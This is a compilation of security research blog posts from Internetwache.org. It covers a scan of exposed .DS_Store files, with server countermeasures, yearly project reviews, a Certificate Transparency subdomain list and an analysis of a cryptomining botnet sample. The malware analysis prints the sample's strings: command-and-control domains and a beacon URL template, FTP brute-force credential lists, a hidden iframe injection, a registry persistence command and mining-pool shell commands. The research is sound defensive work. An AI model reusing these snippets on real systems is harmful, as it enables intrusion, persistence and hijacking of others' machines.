According to the WHOIS information, this domain was registered on 2012-06-03T13:17:26Z by Sebastian, although the idea for this project existed much longer.

Therefore, the project’s 10 year anniversary was last year. Back then, Sebastian was finishing his A-Levels, when he decided to pursue this project. 10 years are a long time and thus a few things have changed over time.

Nowadays, Sebastian is a PhD candidate at the TU-Berlin in the IT-Sec field. There, he teaches students, supervises theses and publishes academic papers.

During the past 10 years, several persons supported this project. However, for all of them, time has not stopped, too, and their personal and professional careers have evolved as well. Thus, the project is now back in Sebastian’s hands. Nonetheless, we would like to thank everyone who was involved for their time and support.

Although it was a bit quite in the past and might be in the future, this project is still alive :-)

Best regards, Sebastian

What is a “.DS_Store” file?

Lets have a look on what exactly a .DS_Store file is. Some people may have seen it after they handed an USB drive to an Apple-using colleague. It will most likely contain at least one (hidden) file with the name .DS_Store. The name stands for “Desktop Services Store” and the file contains meta information about a directory’s files and display options. On Mac-OS based operating systems the “Finder” will create those files automatically. Similar to other *NIX-like operating systems, the file name is prefixed with a dot to hide it from a normal user. Unfortunately, the file format is not open, but proprietary as it was developed by Apple. Therefore, it is usually only used on Apple devices. The blogpost “The origins of .DS_Store” by one of its inventors from 2006 discusses how he would have changed the name and that the file’s distribution on the file system is huger than expected. He says that instead of creating the file when a directory is viewed the first time, it was supposed to only be created when the directory’s (display) options changed. To this date, you will find the file all around your harddrive if you’re a Mac-OS user and you might think that this file is just an unless leftover.

Some readers might know or might have noticed that the file is not human-readable, but consists binary data. Because a detailed explanation of the file’s structure and format would have been too much for this blogpost, [Sebastian published it on this 0day.work blog.

How can this file become an issue?

A .DS_Store file can become a (security) issue when it falls from the local file system into the hands of others. For example by uploading a website from a development system onto a server on the internet. If an attacker can obtain such a file from a webserver - that didn’t block the request - it could help her to learn about other (hidden) files on the webserver. We were curious to see if this issue arises in the real world and did some research that we will describe in the next sections.

We used the well-known Alexa top 1M list of the most visited websites on the internet. Should we find the file on those websites, they most-likely are prone to an information leak. Sebastian’s [library to parse .DS_Store files] (https://github.com/gehaxelt/ds_store/blob/master/ds_store.go) written in Go integrated well with our scanning tool that we have used for previous research. During the last hacker congress (34C3) in Leipzig, we used the fast internet connection to scan the list within the four days.

The methodology

The tool does the following:

• Send a HTTP GET-request to http://domain.tld/.DS_Store
• Parse the file and extract the file names
• If the recursive mode is enabled: Check if any of the file names is a directory and if there’s another .DS_Store file accessible
• For all obtained file paths: Send a HTTP HEAD-request to the resulting URL to check if the file is accessible

For our analysis, we used the tool with the recursive mode enabled, because usually the interesting and sensitive files are not in the document root. But luckily, there is often another .DS_Store file in a subfolder that allows to get a deeper insight. However, the parsing of the .DS_Store files and the resulting file names didn’t tell us if the file was also uploaded from the local system to the server. To answer the question what files are still accessible and potentially downloadable from the server, we used the following simple test: Send a HTTP HEAD-request to the URL where the file is expected to be. A webserver will only reply with the headers and omit the response body. This method might not be the most reliable one, because some webservers block HEAD requests or send a “OK” (200) status code even for “Not found” (404) errors. However, you cannot claim that we have accessed any (potentially) sensitive information from your server. When we received a statuscode of 200, we assumed that the file exists and can be downloaded.

The results

Our tool was verbose and we gathered the data in a huge logfile. From the 1M domain list, about 10 000 exposed a .DS_Store file. We were disappointed at first, because we expected more sites to be affected, but it turned out that even the small dataset gave interesting insights. Furthermore, the parser is probably not 100% bug free and compatible with all .DS_Store files, so that might as well be a reason for missing some websites. In the end, the logfile contained 1185671 URLs (due to the recursion the number exceeds 1M) that we will discuss now.

The HTTP response codes are distributed as follows (only the top 5):

The majority of the discovered files seemed to be accessible. For more than 21 000 URLs we failed to get a statuscode and the 403, 404 or 500 status codes indicate that the files were likely not accessible. Furthermore, the number of accessible files was not distributed evenly between the websites. We observed that there are several big websites that have a .DS_Store file in almost all their subdirectories. In that case the developers apparently overlooked to remove the file what could allow an attacker to get a deep insight into webserver’s folder/file structure.

Domain names are masked for security reasons

1
2
3
4
5
6
7
8
9
10

  80957 domain1.tld
  67754 domain2.tld
  55143 domain3.tld
  19688 domain4.tld
  19520 domain5.tld
  18989 domain6.tld
  12525 domain7.tld
  12058 domain8.tld
  11521 domain9.tld
  11463 domain10.tld

Another interesting observation is the distribution among the top level domains. Here’s an excerpt from the top 25:

After we showed what domains and to what extent they are affected, we can go one and look into other details. For example the file names that we have obtained using this method. As explained earlier, the following numbers are based on a returned statuscode of 200. So there might be more (interesting) files that an attacker could download if she just tries to do so. The top 10 of all file endings is:

1
2
3
4
5
6
7
8
9
10

 256715 .jpg
  75177 .png
  64835 .php
  42422 .html
  39691 .gif
  23683 .htm
  16397 .pdf
   9736 .js
   9346 .txt
   6886 .css

If you look at the full 1500 entries long list, you will spot file endings that are more likely to pose a security risk and could contain sensitive information:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

661 .bak
569 .gz
549 .doc
464 .db
343 .csv
266 .eml
248 .log
240 .old
202 .docx
186 .inc
162 .config
129 .cfg
123 .sql
123 .sh
105 .htaccess
 55 .git
 35 .LOG
 23 .orig
 22 .tgz
 21 .pem
 18 .out
 16 .conf
 16 .cfs
 10 .php_old
 10 .php_
 10 .key
  8 .back
  6 .backup
  5 .bkp
  4 .php_bak
  3 .htpasswd
  2 .core
  2 .bash_history

For example, the following files fall into the “.bak” category:

1
2
3
4

  9 index.php.bak
  2 wp-config.php.bak
  2 php.ini.bak
  2 db.bak

Some of those files are likely to be easily downloadable, because not authentication was in place and they not only existed on the developer’s local environment, but also on the server. With the above described technique, we noticed several file endings and file names that indicated a leak of sensitive data. As far as it was possible for us, we tried to notify the affected parties. Most of the contacted administrators have fixed the issue by removing the files from the webserver, but other’s didn’t seem to bother. Hopefully this blogpost will help to increase the awareness about the issue.

More Interesting facts

It is very interesting to take a look on the history of this issue, because there have been several minor “fixes” - but most of them still do not address the core problem. In 2001 there have been the first discussions about the issue - today (17 years later) this file still leads to security problems.

In the past Apple had to stop the creation of .DS_Store files on shared network drives, due to a huge amount customer complaints. Furthermore they published a support article that describes how to deactivate this functionality. As mentioned in the beginning: Even one of the inventors of “.DS_Store” was not that happy about the chosen name and called its vast distribution “an unfortunate bug”. Adobe also discusses the “.DS_Store” in the Dreamweaver FAQ and recommends to create a cronjob in order to delete the .DS_Store-files periodically. We believe this “solution” is better than nothing, but still does not solve to core problem - there’s still a timespan in which these files are downloadable for an attacker. About two years ago a researcher found a .DS_Store on Twitter’s website and got a bug bounty reward of 560$. He was able to unveil a license key, a wifi certificate and a CA certificate.

Countermeasures

To avoid the information leaks of this kind, we recommend to obey the an important, general rule: Never upload data to the webserver’s document root that should not be (somehow) accessible. The rule might make sense to you, but our colleague Hanno Böck showed at the 34C3 that “wget” is often enough to obtain sensitive information ranging up to even full datasets. His research shows that there’s still a lot of room for improvement.

If you want to check if the discussed files can be found on your Linux-server, you can use the following commands:

1
2

cd /var/www # or wherever your document root is
find . -type f -iname "*.DS_Store*"

The command will search through all folders in /var/www for files with “.DS_Store” in their name and print it on the console. If any files were found and you did not explicitly put them there, then you should consider adding the -delete flag to the above command to delete all the found files.

Removing the files is a first step, but better security can be achieved by blocking the access to files with that file name. Here’s how to configure the two most common webservers:

Apache

Add the following lines to the httpd.conf to block access to the file:

1
2
3
4

<Files ~ "\.DS_Store$">
    Order allow,deny
    Deny from all
</Files>

Nginx

Add the following lines to your server blocks:

1
2
3

location ~ \.DS_Store$ {
      deny all;
}

In addition to that, you should check, that:

• those files are not committed to your VCS (e.g. git/svn/etc) and then pulled on your server.
• those files are excluded or removed prior to a rsync/(s)ftp or other file transfer to the server.

Proof of Concept

We have built a small demowebsite that lets you upload and parse out file names of .DS_Store files online to help you understand what information may have leaked somewhere.

• Link to the “Online .DS_Store Parser”

Disclamer: Please use it only for educational purposes or to test your own files. Any malicious use is prohibited!

There is a small FAQ, but feel free to send us an email if you have further questions about this tool.

Further research

The .DS_Store files are sometimes also included in ZIP files when they were created on Mac-OS. Furthermore, there are files/directories like “.Trash”, “desktop.ini” or “Thumbs.db” that might as well contain pointers to file names. Our parser focused on the extraction of file names, but apparently there is also other information stored in a .DS_Store file, e.g comments. Those information might help to increase the attack surface.

The Team of Internetwache.org

In 2017 there have been some personal and also industry-wide events. The Windows-Malware “WannaCry” affected a large number of computers across the globe in May. It impressively showed how important computers are in a modern and digitalized world and that there can be enormous threats due to security risks. Mainly due to our research in 2016 (we found three vulnerable waterworks located in Germany which were exposed to the internet) we were invited to speak at a hearing of the european parliament (in Brussels / Belgium). We outlined our experiences and impressions on the internet security topic with a focus on IoT-Security and this (lobbyism) was was a new, exciting experience for us. It is very important that, next to industry representers, civil society groups get the possiblilty to contribute to a political debate in order to archieve a better balance of interests.

Finally #WannaCry was the reason for our new sticker ;)

The ”Federal Office for Information Security (German: Bundesamt für Sicherheit in der Informationstechnik, abbreviated as BSI)” mentioned our findings (hackable waterworks and mobile traffic light systems) in their report about Germany’s IT security situation (page 14). Unfortunately, we are only mentioned in the German, but not English version.

Another highlight of the year was that both, Tim and Sebastian, finished their Bachelor’s degree, but more about that in the “personal success” section.

Lately, we were informed by several friendly people that our website is listed as “dangerous” on some Anti-Virus blacklists. We are not completely sure why it happened (perhaps it has something to do with our article about cryptomining malware), but we are working hard on getting this fixed. If you see a strange warning or our domain on a blacklist - we would be happy to get an email from you! Contact us here.

Media reports

In 2017 we continued our plan to share our research results with the media in order to outline the importance of information security to the general public. As a side effect it helps to bring the project into a not-only-for-the-tech-community perspective. A handful of well-known TV broadcasters like ARD, ZDF interviewed us about our research findings and opinions on certain topics. Unfortunately the videos are in German, but feel free to have a look at them anyway :)

• https://www.zdf.de/verbraucher/wiso/wiso-clip-3-hackerangriffe-auf-infrastruktur-wasser-strom-werke-100.html
• https://www.tagesschau.de/multimedia/sendung/bab/bab-3971~_bab-sendung-363.html
• https://www.zdf.de/dokumentation/zdfzoom/zdfzoom-datenklau-und-cyberwar-100.html
• https://www.taz.de/Gehackte-Daten-aus-dem-Bundestag/!5436704/
• https://www.politico.eu/article/hacked-information-bomb-under-germanys-election/

The only English report is on politico.eu: http://www.politico.eu/article/hacked-information-bomb-under-germanys-election/

golem.de

We have a good cooperation with one of the biggest german tech-blogs called “golem.de”. Their reach is way higher than ours and that’s why we sometimes post the findings there. All posts are in German, but maybe Google translator will help :)

• Luxury clinic Switzerland found on the Internet
• Debate about the new OWASP Top10
• G20 Portal (police) has legal problems due to missing HTTPs
• Background article about wind power and information security

Conferences and talks

Last year we attended several conferences.

Sebastian took part in the RuCTF finals as part of the @ENOFLAG team for the second time. As usually, a three-day conference was part of the event.

I had fun with my colleagues from @ENOFLAG at the @ructf finals!

Nice venue, nice challenges, nice people. 10/10 :) #ructf pic.twitter.com/l6DXaPjUMz

— Sebastian Neef (@gehaxelt) 24. April 2017

A conference organized by Golem.de about Quantum computing took place in June and we were invited. The talks about that topic (for us a relatively new topic) were quite interesting and enlightening. People believe that quantum computing will break classic cryptography, but at the moment most of the quantum computers don’t have enough Qubits (compute power) to effectively do so. We are curious how this will develop in the next few years and we will definitely have a look at it.

Woop woop! I'm ready for quantum computing and interesting talks. Thanks for the invitation, @golem :) pic.twitter.com/PsISBA1hKB

— Sebastian Neef (@gehaxelt) 23. Juni 2017

In September 2017 Tim was at Z2X which is a kind of a future festival for young people between 20 and 30 - it was organized by the online department of ”DIE ZEIT” (a big german newspaper). He presented our project’s idea and in the end it was voted on the second place by the 800 Z2X participants. We are happy about the positive feedback and plan to share our work more often on such events. In 2018 Z2X is definitely on our list and Sebastian would like to join next time!

#Z2X17-Finalist: https://t.co/3ygE9usCVt will das Internet durch Hacking sicherer machen pic.twitter.com/FMQC9a5vTF

— z2xfest (@z2xfest) 3. September 2017

At the end of the year we were at the largest, european hacker congress, the 34th edition of the Chaos Communication Congresses for the 4th time in a row. The hacker-atmosphere was great and we enjoyed interesting talks and met a lot of friends and followers! Just as last year, we had our own “assembly” that we used as a gathering/communication point. The conference moved from Hamburg to Leipzig what lead to a few challenges and changes, but we all had a wonderful time. We can’t wait for this year’s edition #35c3!

Thank you for a very nice #34c3
Amazing talks, friendly discussions and hacking around! Looking forwars to #35c3 ^ts pic.twitter.com/bOgLmp0EX0

— Internetwache.org (@internetwache) 30. Dezember 2017

The new “Wannacry” stickers have been considered “better than last year” and we managed to distribute all of them (1000 pcs). Did you (not) get a sticker? Let us know :)

We distributed around 1000 new stickers at the #34C3. Who got a fancy #wannacry sticker on his laptop now? ^sn pic.twitter.com/71WdIEpQ1M

— Internetwache.org (@internetwache) 4. Januar 2018

Personal success

Sebastian (@gehaxelt) finished his Bachelor degree with a thesis about the Implementation and Evaluation of a Framework to calculate Impact Measures for Wikipedia Authors. After that achievement, he drove 12,000 kilometers with a Audi 100 through most countries of Eastern Europe in companionship of a good friend. Interesting experiences, people and memories were collected during this 2.5 month long roadtrip. For 2018, he plans to study abroad and begin his master degree.

Tim (@TimPhSchaefers) also finished his Bachelor. In his thesis he deals with an evaluation of “Privileged Access Management” solutions. Furthermore, Tim was named a Junior-Fellow by the German Informatics Society. He also finished his second book (together with a fellow student) with the name “WLAN Hacking” that will be published in January 2018. As part of the Junior-Fellowship, Tim especially wants to point out the importance of IT-Security and Privacy.

2017 in numbers

With more than 2200 followers on our @internetwache twitter profile, we count a daily growth of ~1.6 followers per day during the last year.

Regarding our page impressions on our blog, we only have positive news! We are counting more than 40.000 visitors and a total of 52.000 pageviews. It is an increase of around 50% in comparision to 2016. Most of the traffic comes from our international readers, because the English blog is frequented three times more often than the German one. This surprised us a bit, because we only wrote merely three new blogposts last year! Sadly we did not have more time for more research and blogposts, but as we said last year: Quality >>> Quantity!

We hope to publish our ongoing research in early 2018, so stay tuned for more :)

Outlook on 2018

Originally, we planned to host another CTF this year, because our first CTF in 2016 was so much fun and we got mostly good feedback. However, we did not find the time to write all the challenges and organize everything. Maybe we will manage to do it this year!

We would like to continue our cooperation with the media and attend more conferences (and even give talks). Furthermore, we would like to purse and publish more research. At least we have enough ideas!

We wish everybody a successfull 2018!

Tim & Sebastian

The Team of Internetwache.org

Certificate Transparency is a project initiated by Google that tries to monitor all issued SSL/TLS certificates with the goal of identified and revoking mis-issued certificates. Certificate Authorities are requested to publish information about their issued certificates into the publicly accessible CT logs. That is why you will find all certificates for internetwache.org on crt.sh for example.

A log entry contains all information about a certificate, and therefore the fully qualified domain name (FQDN). Since the start of Let’s Encrypt, it has become really easy to obtain and use SSL-/TLS certificates free-of-cost. However, it does not support wildcard domains (yet), but it’s on the roadmap for January 2018. Until then, every subdomain has to be explicitly listed in the certificate (or multiple certificates used). This means, that subdomains whose existence was not known before (security by obscurity, e.g. xyz-asd.domain.tld…) are easy to discover now.

Undoubtedly this information can be interesting from a hacker’s perspective. Sebastian’s idea was to use the certstream python module to subscribe to Certificate Transparency log updates, parse the subdomain and save the result in a database. Each subdomain also comes with a counter to sort it by frequency. The resulting lists with the top 100/1000/10,000/100,000 subdomains is automatically exported to the “CT_Subdomains” GitHub repository on an hourly basis.

The files have the following scheme:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

# Generated 2017-12-11 11:00:01.087903
count,subdomain
8529329,*
3573653,www
779370,mail
507273,webdisk
497893,webmail
480967,cpanel
178293,autodiscover
21955,dev
19415,blog
18989,m
18518,test
16513,shop
15859,whm
10483,api
10236,admin
9341,com
7521,mdp
7484,staging
7370,cloud
7173,demo
6667,app
6275,tls
6070,eu
5882,mbox12
5223,store

Link to the GitHub “CT_subdomains” repository

One could use this list as the input for DNS reconnaissance tools like gobuster.

There has been previous research about security implications in regards to certificate transparency logs, for example by Hanno Boeck at the DEF CON 25.

The team of internetwache.org

Community action & CTF

Like mentioned in the last year’s review we would like to thank a lot of people for supporting the project internetwache.org. For this reason we organized a “Capture The Flag” (CTF) on a weekend in february. The participation was overwhelming! Over 1500 teams registered and 650 teams actively participated in the CTF. For anybody who is interested in a deeper look on the statistics of it, we refer to this blogpost.

Another small community action was our first batch of stickers which we gave away on the 33c3 (CCC-Congress) . We think that the stickers are “quite” good for a first try - but we also see that we can improve some things. If you meet us somewhere, just ask friendly and we’ll give you some, too.

Our work

As we pointed out in the last year’s blogpost we wanted to explore Industrial Control Systems (ICS) and SCADA-systems. We were lucky to find 4 waterworks unprotected and unsecured on the internet. We also got a hint that there were mobile traffic light systems connected to the internet which were vulnerable to an exploit. All those cases were reported to several CERTs in order to get critical systems off the internet or vulnerabilities fixed. In September we also researched cryptomining malware.

In general we still like the idea behind bug bounty programs and responsible disclosure - but we are not as active as we haven been before. We simply do not have the time for doing a lot of bug bounty hunting due to work or studing. Another reason is that there are more researchers than some years ago. We are still active on platforms like HackerOne or Bugcrowd, but mostly in private bug bounty programs.

Media reports

We are very excited that our work was also covered by many media reports which normaly do not report about information security related topics. For example the German magazine Spiegel reported about our waterwork findings online and in print. Furthermore we published some articles on the well-known news sites such as zeit.de, handelsblatt.de or golem.de.

New in 2016 was that our work was also covered by video broadcasters like Deutsche Welle (DW), ARD, WDR and SpiegelTV (RTL). To give you a little expression about this you might take a look at the following video.

We would like to thank all corresponding jornalists for their coverage and also some constructive criticism about our work. We will try to continue our cooperation with the media to inform about modern cyberrisks in our society and to secure our daily (digital) lifes. If you have any constructive critisism, ideas or just want to write us something, you can find all details on the contact page.

Conferences

Last year, Sebastian and Tim visited a bunch of conferences and we also wrote blog posts about them. Tim attended the Security Analyst Summit 2016 and Sebastian joined the TROOPERS and the Alligatorcon conference. Furthermore it has become kind of a “tradition” to visit the CCC-Conference (Chaos Computer Club) (33c3) at the end of the year. We had our very own assembly there and that made the conference even more enjoyable. We like conferences especially for getting new ideas and experience and furthermore for getting to know a lot of new people. We would like to thank the people we met at conferences a lot for nice conversations and for giving some insight view into their professional work.

2016 in numbers

After our successful Internetwache-CTF our follower count on twitter increased steadily. We can look at more than 1600 interested followers. If you’re also interested, but don’t follow us yet, you can find us on twitter @internetwache.

The traffic to our webblog doubled during the year. We had around 25000 visitors and 45000 pageviews. With only 8 new articles those numbers are quite impressive. The reason for the low amount of articles can be found in our FAQ, but in essence we don’t have enough time and we prefer quality over quantity. Another reason is that we write all posts in German and English, so more effort.

Since mid 2016 Julien is no longer part of the Internetwache.org team. We would like to thank Julien for his contributions and support and wish him all the best! We highly recommend Julien’s securiy blog rcesecurity.com and hope that we’ll stay in touch. As a sign of appreciation we’ve put his name into our Hall of Fame.

Personal successes

Sebastian writes about his non-web security research on his blog 0day.work. For the next he plans to publish some more research and interesting blogposts. Furthermore Sebastian participated in a lot of CTFs - in most cases as a part of the @ENOFLAG team. The RuCTF finals in Jekaterinburg were really exciting. Measured by the amount of consumed vodka, the 9th place is still presentable :). They finished the qualification for the next year’s finals on the 6th place.

Tim writes about the topics privacy and information-security on the german IT-news website golem.de until early 2016. Furthermore he published his first German IT-textbook with the title “Hacking im Web” which was sold over 1000-times within the first 5 month after the publication. Tim also has a webblog about websecurity in German which covers topics of the book. Secondary to his Bachelor studies he finished his training and lived 3 month in Barcelona. 2017 will be the final part of his dual studies - furthermore he plans to write some blogposts (on an own blog).

Outlook on 2017

We archieved most of the goals we had for 2016. So here’s an educated guess about our work for the next year. A new Internetwache.org CTF is in prepartion, but we don’t have enough ideas yet and not enough time for implementing all challenges. Furthermore we want to do some new research in the field of it-security, but we do not want to spoiler now. Cooperating with media is fun. We will continue to share our opinion about questions of IT and information security to archieve a more secure (digital) society.

You will hear from us ;)

Sebastian Neef und Tim Philipp Schäfers

The team of Internetwache.org

At the beginning we were not sure about the “photo.scr”. We discovered the file in all folders on some systems and there was also an autodownload starting when we tried to open a HTML-file (the help-file of an ICS-software). That was the point when we decided to take a deeper look at it. Not much time passed before we found out that the file belongs to a cryptomining-botnet which was also covered by some security companies in other publications.

We already decribed some results in a german article on the IT-news site golem.de: Kritische Infrastrukturen: Wenn die USV Kryptowährungen schürft

For the analysis we maily used the service malwr.com. We uploaded a few samples to the website and also found some other reports from people who uploaded similar samples. As far as we know, most of the samples are following similar patterns of behaviour. In this blogpost we focuse on this sample - because we found it on an ICS and took a deeper look at it.

The file is 1578496 bytes (~1.6 MB) big and is identified as PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows.

1
2
3
4
5

$> file 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin: PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows

$> du -sb 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
1578496 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin

Sample’s hash sums

1
2
3
4
5
6
7
8

$> md5sum 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
aba2d86ed17f587eb6d57e6c75f64f05  807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin

$> sha1sum 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
aeccba64f4dd19033ac2226b4445faac05c88b76  807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin

$> sha256sum 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d  807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin

As we might know, one should not run the command “strings” on an unknown file. That’s why we used the helpfull features of radare2.

1
2
3
4
5
6
7
8
9
10
11
12
13
14

$> r2  file 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin 
> iS
[Sections]
[...]sz=79872 vsz=79824 perm=m-r-x name=.text
[...]sz=1536 vsz=1124 perm=m-rw- name=.data
[...]sz=10752 vsz=10260 perm=m-r-- name=.rdata
[...]sz=1024 vsz=1016 perm=m-r-- name=.eh_fra
[...]sz=0 vsz=19276 perm=m-rw- name=.bss
[...]sz=3584 vsz=3480 perm=m-rw- name=.idata
[...]sz=512 vsz=28 perm=m-rw- name=.CRT
[...]sz=512 vsz=32 perm=m-rw- name=.tls
[...]sz=1479680 vsz=1479216 perm=m-rw- name=.rsrc

9 sections

As we can see, the .rsrc ressource section is with around 1,4 MB the biggest one. Let’s take a more closer look at it, but before that, we have to extract it. We can use wrestool :

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19

$> mkdir wrestool && cd wrestool/
$> wrestool -a -R -x -o ./ ../807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin  
$> ls
total 1,5M
[...] 4,0K  3. Sep 14:59 .
[...] 4,0K 22. Aug 00:46 ..
[...] 1,4M  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_10_RCDATA1
[...]  146  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_14_ICON1.ico
[...] 1,7K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_1
[...] 1,2K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_10
[...]  744  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_2
[...]  296  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_3
[...] 3,7K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_4
[...] 2,2K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_5
[...] 1,4K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_6
[...]  20K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_7
[...] 9,5K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_8
[...] 4,2K  5. Sep 00:27 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_3_9
[...]  45K 22. Aug 00:41 bad-file_14_ICON1.ico

In this case we see many small files, but there is one which seems to be the most interesting one: The one with the suffix “RCDATA1”. wrestool identified most resources as icons, but only two look like valid folder-icons. These icons seem to be used to trick some users (social engineering) to think that the program is a folder - to initiate a double click.

In some modern webbrowsers, e.g Firefox, there is a built-in protection: It shows that the file is an application despite having a folder icon.

The extraordinary big file also seemed to be a windows-executable:

1
2
3
4
5

$> file 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_10_RCDATA1 
807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_10_RCDATA1: PE32 executable (console) Intel 80386, for MS Windows

$> md5sum 807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_10_RCDATA1 
3afeb8e9af02a33ff71bf2f6751cae3a  807126cbae47c03c99590d081b82d5761e0b9c57a92736fc8516cf41bc564a7d.bin_10_RCDATA1

If one searches for the MD5-hash 3afeb8e9af02a33ff71bf2f6751cae3a, one can find a program with the name NsCpuCNMiner32.exe. We will find out the purpose of this program later.

The strings from the .data section. There are some interesting entries!

For example which domains are used for communication:

1
2
3
4
5
6
7
8
9

[...]string=stafftest.ru
[...]string=hrtests.ru
[...]string=profetest.ru
[...]string=testpsy.ru
[...]string=pstests.ru
[...]string=qptest.ru
[...]string=prtests.ru
[...]string=jobtests.ru
[...]string=iqtesti.ru

In the malwr.com log you can see, that there is a HTTP-request to the following URL: httpx://stafftest .ru/test.html. We can find the same entry in the binary:

1

[...]string=http://%s/test.html?%d

If you request this URL in a secure environment you get HTML sourcecode and a lot of gibberish. An analysis of Fortinet shows that only some characters need to be interchanged in order to get the cleartext - it seems to be a ROT47 chiffre with a modified charset and it can be reverted by runnning the following program:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21

#!/usr/bin/python2
import requests

def decode(URL):
    charset = " mnbvcxzlkjhgfdsapoiuytrewq/0987654321!@=%&?:.,["
    r = requests.get(URL)
    content = r.content
    output = ""

    for c in content:
        if c in charset:
            pos = 47 - charset.index(c)
            output += charset[pos]
        else:
            output += c

    return output

print decode("httpx://stafftest .ru/stat.html")
print decode("httpx://stafftest .ru/test.html")
print decode("httpx://stafftest .ru/text.html")

There’s an example run in our paste.

1

[...]string=httpx://hrtests .ru/S.php?ver=24&pc=%s&user=%s&sys=%s&cmd=%s&startup=%s/%s

Furthermore, a HTTP-request with multiple parameters is performed. The parameters seem to be the version ver, the computer’s name pc, the user name user and some more. We think that these values are used for the backend - so that the cybercrimials have an overview of how many and which kind of systems are infected. The parameter ver also indicates that the malware’s development is quite professional (with new releases and such). GuardiCore’s analysis also points out that with every new version a few new mechanisms for spreading the malware are implemented.

[…]strings also contains NsCpuCNMiner again (it exists for 32-bit and aswell for 64-bit computers) and is placed in the %%TEMP%% directory.

1
2

[...]string=%s\NsCpuCNMiner32.exe
[...]string=/c start /b %%TEMP%%\NsCpuCNMiner32.exe -dbg -1 %s

Before the miner can run, it needs a list of mining pools to use. A handful of initial mining pool addresses were hardcoded and placed with a shell command in a file called pools.txt, but more were fetched with the shown HTTP request.

1

[...]string=/c (echo stratum+tcp://mine.moneropool.com:3333& echo stratum+tcp://monero.crypto-pool.fr:3333& echo stratum+tcp://xmr.prohash.net:7777& echo stratum+tcp://pool.minexmr.com:5555)> %TEMP%\pools.txt

In order to attribute the solved blocks to the right account on the mining pool, an account-specific API-Key has to be used:

1

[...]string=-o stratum+tcp://mine.moneropool.com:3336 -t 1 -u 42n7TTpcpLe8yPPLxgh27xXSBWJnVu9bW8t7GuZXGWt74vryjew2D5EjSSvHBmxNhx8RezfYjv3J7W63bWS8fEgg6tct3yZ -p x

Reddit users were able to find out a few other adresses and API-Keys which seem to belong to the same person or group.

The malware is bruteforcing poorly configured FTP servers with the following usernames:

1
2
3
4
5
6
7
8
9

[...]string=anonymous
[...]string=Admin
[...]string=admin
[...]string=www-data
[...]string=anonymous
[...]string=Admin
[...]string=admin
[...]string=www-data
[...]string=administrator

and passwords:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

[...]string=test
[...]string=password
[...]string=pass
[...]string=pass1234
[...]string=1234
[...]string=12345
[...]string=123456
[...]string=1234567
[...]string=12345678
[...]string=123456789
[...]string=1234567890
[...]string=qwerty
[...]string=devry
[...]string=000000
[...]string=111111
[...]string=123123
[...]string=abc123
[...]string=admin123
[...]string=derok010101
[...]string=windows
[...]string=123qwe
[...]string=email@email.com

The following strings of typical filetypes on a webserver might be a sign that the malware is changing their content to hide or spread itself.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

[...]string=.php
[...]string=.PHP
[...]string=.htm
[...]string=.HTM
[...]string=.xml
[...]string=.XML
[...]string=.dhtm
[...]string=.DHTM
[...]string=.phtm
[...]string=.xht
[...]string=.htx
[...]string=.mht
[...]string=.bml
[...]string=.asp
[...]string=.shtm

The manipulation consists of placing a 1x1 pixel sized Iframe, in which the malicious photo.scr is embedded. The code for that is:

1

[...]string=\n<iframe src=Photo.scr width=1 height=1 frameborder=0>\n</iframe>\n

To achieve persistence, an autostart entry is created by using a registry entry. Additionally it tries to copy itself to all attached storage devices as seen below.

1
2

[...]string=/c reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Run" /d "%s" /t REG_SZ /f
